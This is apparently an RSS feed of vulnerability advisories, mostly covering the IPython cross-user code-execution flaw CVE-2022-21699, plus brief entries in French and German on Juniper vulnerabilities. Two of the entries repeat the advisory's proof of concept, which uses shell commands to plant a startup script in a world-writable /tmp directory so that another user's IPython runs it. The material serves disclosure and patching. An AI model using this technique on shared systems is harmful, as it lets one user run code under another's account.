<?xml version='1.0' encoding='UTF-8'?>
<?xml-stylesheet href="/static/style.xsl" type="text/xsl"?>
<rss xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/" version="2.0">
  <channel>
    <title>Most recent entries from all</title>
    <link>https://cve.radiocsirt.org</link>
    <description>Contains only the most 10 recent entries.</description>
    <docs>http://www.rssboard.org/rss-specification</docs>
    <generator>python-feedgen</generator>
    <language>en</language>
    <lastBuildDate>Fri, 02 Oct 2026 20:35:39 +0000</lastBuildDate>
    <item>
      <title>bdu:2022-05761</title>
      <link>https://cve.radiocsirt.org/vuln/bdu:2022-05761</link>
      <description>bdu:2022-05761</description>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/bdu:2022-05761</guid>
    </item>
    <item>
      <title>BREW-fdroidserver-CVE-2022-21699 — Execution with Unnecessary Privileges in ipython</title>
      <link>https://cve.radiocsirt.org/vuln/brew-fdroidserver-cve-2022-21699</link>
      <description>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; Homebrew: fdroidserver&lt;/p&gt;
&lt;p&gt;We’d like to disclose an arbitrary code execution vulnerability in IPython that stems from IPython executing untrusted files in CWD. This vulnerability allows one user to run code as another.
 
Proof of concept&lt;/p&gt;
&lt;p&gt;User1:
```
mkdir -m 777 /tmp/profile_default
mkdir -m 777 /tmp/profile_default/startup
echo &amp;#39;print(&amp;#34;stealing your private secrets&amp;#34;)&amp;#39; &amp;gt; /tmp/profile_default/startup/foo.py
```&lt;/p&gt;
&lt;p&gt;User2:
```
cd /tmp
ipython
```&lt;/p&gt;
&lt;p&gt;User2 will see:
```
Python 3.9.7 (default, Oct 25 2021, 01:04:21)
Type &amp;#39;copyright&amp;#39;, &amp;#39;credits&amp;#39; or &amp;#39;license&amp;#39; for more information
IPython 7.29.0 -- An enhanced Interactive Python. Type &amp;#39;?&amp;#39; for help.
stealing your private secrets
```&lt;/p&gt;
&lt;p&gt;## Patched release and documentation&lt;/p&gt;
&lt;p&gt;See https://ipython.readthedocs.io/en/stable/whatsnew/version8.html#ipython-8-0-1-cve-2022-21699,&lt;/p&gt;
&lt;p&gt;Version 8.0.1, 7.31.1 for current Python version are recommended. 
Version 7.16.3 has also been published for Python 3.6 users, 
Version 5.11 (source only, 5.x branch on github) for older Python versions.&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; Homebrew: fdroidserver&lt;/p&gt;
&lt;p&gt;We’d like to disclose an arbitrary code execution vulnerability in IPython that stems from IPython executing untrusted files in CWD. This vulnerability allows one user to run code as another.
 
Proof of concept&lt;/p&gt;
&lt;p&gt;User1:
```
mkdir -m 777 /tmp/profile_default
mkdir -m 777 /tmp/profile_default/startup
echo &amp;#39;print(&amp;#34;stealing your private secrets&amp;#34;)&amp;#39; &amp;gt; /tmp/profile_default/startup/foo.py
```&lt;/p&gt;
&lt;p&gt;User2:
```
cd /tmp
ipython
```&lt;/p&gt;
&lt;p&gt;User2 will see:
```
Python 3.9.7 (default, Oct 25 2021, 01:04:21)
Type &amp;#39;copyright&amp;#39;, &amp;#39;credits&amp;#39; or &amp;#39;license&amp;#39; for more information
IPython 7.29.0 -- An enhanced Interactive Python. Type &amp;#39;?&amp;#39; for help.
stealing your private secrets
```&lt;/p&gt;
&lt;p&gt;## Patched release and documentation&lt;/p&gt;
&lt;p&gt;See https://ipython.readthedocs.io/en/stable/whatsnew/version8.html#ipython-8-0-1-cve-2022-21699,&lt;/p&gt;
&lt;p&gt;Version 8.0.1, 7.31.1 for current Python version are recommended. 
Version 7.16.3 has also been published for Python 3.6 users, 
Version 5.11 (source only, 5.x branch on github) for older Python versions.&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/brew-fdroidserver-cve-2022-21699</guid>
    </item>
    <item>
      <title>certfr-2024-avi-0027 — De multiples vulnérabilités ont été découvertes dans les produits
Juniper Networks. Certaines d'entre elles permettent…</title>
      <link>https://cve.radiocsirt.org/vuln/certfr-2024-avi-0027</link>
      <description>certfr-2024-avi-0027</description>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/certfr-2024-avi-0027</guid>
    </item>
    <item>
      <title>EUVD-2026-232840</title>
      <link>https://cve.radiocsirt.org/vuln/euvd-2026-232840</link>
      <description>EUVD-2026-232840</description>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/euvd-2026-232840</guid>
    </item>
    <item>
      <title>fkie_cve-2022-21699</title>
      <link>https://cve.radiocsirt.org/vuln/fkie_cve-2022-21699</link>
      <description>&lt;p&gt;IPython (Interactive Python) is a command shell for interactive computing in multiple programming languages, originally developed for the Python programming language. Affected versions are subject to an arbitrary code execution vulnerability achieved by not properly managing cross user temporary files. This vulnerability allows one user to run code as another on the same machine. All users are advised to upgrade.&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;IPython (Interactive Python) is a command shell for interactive computing in multiple programming languages, originally developed for the Python programming language. Affected versions are subject to an arbitrary code execution vulnerability achieved by not properly managing cross user temporary files. This vulnerability allows one user to run code as another on the same machine. All users are advised to upgrade.&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/fkie_cve-2022-21699</guid>
    </item>
    <item>
      <title>GHSA-pq7m-3gw7-gq5x — Execution with Unnecessary Privileges in ipython</title>
      <link>https://cve.radiocsirt.org/vuln/ghsa-pq7m-3gw7-gq5x</link>
      <description>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; PyPI: ipython&lt;/p&gt;
&lt;p&gt;We’d like to disclose an arbitrary code execution vulnerability in IPython that stems from IPython executing untrusted files in CWD. This vulnerability allows one user to run code as another.
 
Proof of concept&lt;/p&gt;
&lt;p&gt;User1:
```
mkdir -m 777 /tmp/profile_default
mkdir -m 777 /tmp/profile_default/startup
echo &amp;#39;print(&amp;#34;stealing your private secrets&amp;#34;)&amp;#39; &amp;gt; /tmp/profile_default/startup/foo.py
```&lt;/p&gt;
&lt;p&gt;User2:
```
cd /tmp
ipython
```&lt;/p&gt;
&lt;p&gt;User2 will see:
```
Python 3.9.7 (default, Oct 25 2021, 01:04:21)
Type &amp;#39;copyright&amp;#39;, &amp;#39;credits&amp;#39; or &amp;#39;license&amp;#39; for more information
IPython 7.29.0 -- An enhanced Interactive Python. Type &amp;#39;?&amp;#39; for help.
stealing your private secrets
```&lt;/p&gt;
&lt;p&gt;## Patched release and documentation&lt;/p&gt;
&lt;p&gt;See https://ipython.readthedocs.io/en/stable/whatsnew/version8.html#ipython-8-0-1-cve-2022-21699,&lt;/p&gt;
&lt;p&gt;Version 8.0.1, 7.31.1 for current Python version are recommended. 
Version 7.16.3 has also been published for Python 3.6 users, 
Version 5.11 (source only, 5.x branch on github) for older Python versions.&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; PyPI: ipython&lt;/p&gt;
&lt;p&gt;We’d like to disclose an arbitrary code execution vulnerability in IPython that stems from IPython executing untrusted files in CWD. This vulnerability allows one user to run code as another.
 
Proof of concept&lt;/p&gt;
&lt;p&gt;User1:
```
mkdir -m 777 /tmp/profile_default
mkdir -m 777 /tmp/profile_default/startup
echo &amp;#39;print(&amp;#34;stealing your private secrets&amp;#34;)&amp;#39; &amp;gt; /tmp/profile_default/startup/foo.py
```&lt;/p&gt;
&lt;p&gt;User2:
```
cd /tmp
ipython
```&lt;/p&gt;
&lt;p&gt;User2 will see:
```
Python 3.9.7 (default, Oct 25 2021, 01:04:21)
Type &amp;#39;copyright&amp;#39;, &amp;#39;credits&amp;#39; or &amp;#39;license&amp;#39; for more information
IPython 7.29.0 -- An enhanced Interactive Python. Type &amp;#39;?&amp;#39; for help.
stealing your private secrets
```&lt;/p&gt;
&lt;p&gt;## Patched release and documentation&lt;/p&gt;
&lt;p&gt;See https://ipython.readthedocs.io/en/stable/whatsnew/version8.html#ipython-8-0-1-cve-2022-21699,&lt;/p&gt;
&lt;p&gt;Version 8.0.1, 7.31.1 for current Python version are recommended. 
Version 7.16.3 has also been published for Python 3.6 users, 
Version 5.11 (source only, 5.x branch on github) for older Python versions.&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/ghsa-pq7m-3gw7-gq5x</guid>
    </item>
    <item>
      <title>gsd-2022-21699</title>
      <link>https://cve.radiocsirt.org/vuln/gsd-2022-21699</link>
      <description>gsd-2022-21699</description>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/gsd-2022-21699</guid>
    </item>
    <item>
      <title>msrc_CVE-2022-21699 — Execution with Unnecessary Privileges in ipython</title>
      <link>https://cve.radiocsirt.org/vuln/msrc_cve-2022-21699</link>
      <description>msrc_CVE-2022-21699</description>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/msrc_cve-2022-21699</guid>
    </item>
    <item>
      <title>openSUSE-SU-2022:10043-1 — Security update for python-ipython</title>
      <link>https://cve.radiocsirt.org/vuln/opensuse-su-2022:10043-1</link>
      <description>&lt;p&gt;Security update for python-ipython&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;Security update for python-ipython&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/opensuse-su-2022:10043-1</guid>
    </item>
    <item>
      <title>PYSEC-2022-12</title>
      <link>https://cve.radiocsirt.org/vuln/pysec-2022-12</link>
      <description>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; PyPI: ipython&lt;/p&gt;
&lt;p&gt;IPython (Interactive Python) is a command shell for interactive computing in multiple programming languages, originally developed for the Python programming language. Affected versions are subject to an arbitrary code execution vulnerability achieved by not properly managing cross user temporary files. This vulnerability allows one user to run code as another on the same machine. All users are advised to upgrade.&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; PyPI: ipython&lt;/p&gt;
&lt;p&gt;IPython (Interactive Python) is a command shell for interactive computing in multiple programming languages, originally developed for the Python programming language. Affected versions are subject to an arbitrary code execution vulnerability achieved by not properly managing cross user temporary files. This vulnerability allows one user to run code as another on the same machine. All users are advised to upgrade.&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/pysec-2022-12</guid>
    </item>
    <item>
      <title>UBUNTU-CVE-2022-21699</title>
      <link>https://cve.radiocsirt.org/vuln/ubuntu-cve-2022-21699</link>
      <description>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; Ubuntu:Pro:14.04:LTS: ipython, Ubuntu:Pro:16.04:LTS: ipython, Ubuntu:Pro:18.04:LTS: ipython, Ubuntu:Pro:20.04:LTS: ipython&lt;/p&gt;
&lt;p&gt;IPython (Interactive Python) is a command shell for interactive computing in multiple programming languages, originally developed for the Python programming language. Affected versions are subject to an arbitrary code execution vulnerability achieved by not properly managing cross user temporary files. This vulnerability allows one user to run code as another on the same machine. All users are advised to upgrade.&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; Ubuntu:Pro:14.04:LTS: ipython, Ubuntu:Pro:16.04:LTS: ipython, Ubuntu:Pro:18.04:LTS: ipython, Ubuntu:Pro:20.04:LTS: ipython&lt;/p&gt;
&lt;p&gt;IPython (Interactive Python) is a command shell for interactive computing in multiple programming languages, originally developed for the Python programming language. Affected versions are subject to an arbitrary code execution vulnerability achieved by not properly managing cross user temporary files. This vulnerability allows one user to run code as another on the same machine. All users are advised to upgrade.&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/ubuntu-cve-2022-21699</guid>
    </item>
    <item>
      <title>WID-SEC-W-2024-0064 — Juniper Produkte: Mehrere Schwachstellen</title>
      <link>https://cve.radiocsirt.org/vuln/wid-sec-w-2024-0064</link>
      <description>&lt;p&gt;Ein Angreifer aus dem angrenzenden Netzwerk oder ein entfernter, anonymer, authentisierter, lokaler oder physischer Angreifer kann mehrere Schwachstellen in Juniper JUNOS, Juniper JUNOS Evolved, Juniper SRX Series, Juniper EX Series, Juniper QFX Series, Juniper ACX Series, Juniper PTX Series und Juniper MX Series ausnutzen, um beliebigen Code auszuführen, Sicherheitsmaßnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand herbeizuführen und seine Berechtigungen zu erweitern.&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;Ein Angreifer aus dem angrenzenden Netzwerk oder ein entfernter, anonymer, authentisierter, lokaler oder physischer Angreifer kann mehrere Schwachstellen in Juniper JUNOS, Juniper JUNOS Evolved, Juniper SRX Series, Juniper EX Series, Juniper QFX Series, Juniper ACX Series, Juniper PTX Series und Juniper MX Series ausnutzen, um beliebigen Code auszuführen, Sicherheitsmaßnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand herbeizuführen und seine Berechtigungen zu erweitern.&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/wid-sec-w-2024-0064</guid>
    </item>
  </channel>
</rss>
